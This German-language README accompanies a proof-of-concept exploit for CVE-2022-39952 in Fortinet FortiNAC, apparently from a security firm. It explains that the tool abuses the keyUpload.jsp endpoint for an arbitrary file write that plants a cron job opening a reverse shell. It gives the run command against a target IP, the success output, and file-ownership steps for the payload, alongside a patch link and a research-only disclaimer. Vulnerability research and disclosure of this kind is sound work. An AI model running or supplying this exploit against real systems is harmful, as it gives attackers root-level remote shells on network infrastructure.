
PoC für CVE-2022-39952
POC für CVE-2022-39952, der Fortinet FortiNAC betrifft
Die Standardkonfiguration dieses Exploits schreibt einen Cron-Job, um eine Reverse Shell zu erstellen. Stellen Sie sicher, dass Sie die Datei payload an Ihre Umgebung anpassen.
Eine technische Ursachenanalyse der Schwachstelle und Indikatoren für eine Kompromittierung finden Sie in unserem Blog: https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
Dieser POC missbraucht den keyUpload.jsp-Endpunkt, um einen beliebigen Dateischreibvorgang zu erreichen.
root@kali:~/CVE-2022-39952# python3 CVE-2022-39952.py --target 10.0.40.85 --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered
Wenn Sie einen cron-basierten Payload verwenden, stellen Sie sicher, dass die Payload-Datei die entsprechenden Berechtigungen und den richtigen Besitzer hat:
sudo chown root:root payload
sudo chmod 0644 payload
Aktualisieren Sie auf die neueste Version, indem Sie den Anweisungen in der PSIRT folgen https://www.fortiguard.com/psirt/FG-IR-22-300
Diese Software wurde ausschließlich für akademische Forschungszwecke und für die Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich genehmigt. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Nutzen Sie sie verantwortungsbewusst.